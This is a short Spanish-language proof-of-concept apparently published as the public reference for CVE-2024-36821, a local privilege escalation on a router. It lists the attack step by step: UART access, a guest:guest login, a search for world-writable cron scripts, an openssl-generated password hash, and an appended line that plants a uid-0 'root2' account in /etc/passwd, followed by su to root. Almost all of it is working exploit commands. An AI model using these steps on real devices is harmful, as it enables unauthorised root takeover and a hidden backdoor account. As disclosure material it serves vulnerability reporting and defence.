
La referencia pública que contiene la información mínima requerida para la vulnerabilidad cubierta por CVE-2024-36821
La referencia pública que contiene la información mínima requerida para la vulnerabilidad cubierta por CVE-2024-36821
Conéctate al router mediante la conexión UART
Usando las credenciales guest:guest, inicia sesión en el sistema
Usando el comando find / -perm -777 -type f 2>/dev/null, encuentra archivos con permisos de lectura, escritura y ejecución:
1. /tmp/cron/cron.daily/sysinfo_cleanup.sh
2. /tmp/cron/cron.daily/devicedb_backup_daily.sh
3. /tmp/cron/cron.hourly/sysinfo_cleanup.sh
4. /tmp/cron/cron.every5minute/sysinfo_cleanup.sh
5. /tmp/cron/cron.everyminute/conntrack_collector.sh
Verifica el propietario con el comando ls -al /tmp/cron/cron.everyminute/conntrack_collector.sh
Genera la contraseña con el comando openssl passwd Abracadabra
Edita /tmp/cron/cron.everyminute/conntrack_collector.sh, añadiendo al final la nueva contraseña generada:
echo "root2:UlPYin76ss0w2:0:0::/:/bin/sh" >> /etc/passwd
Espera un minuto
Cambia al usuario root2 con el siguiente comando
/ $ su root2
Password: Abracadabra
~ #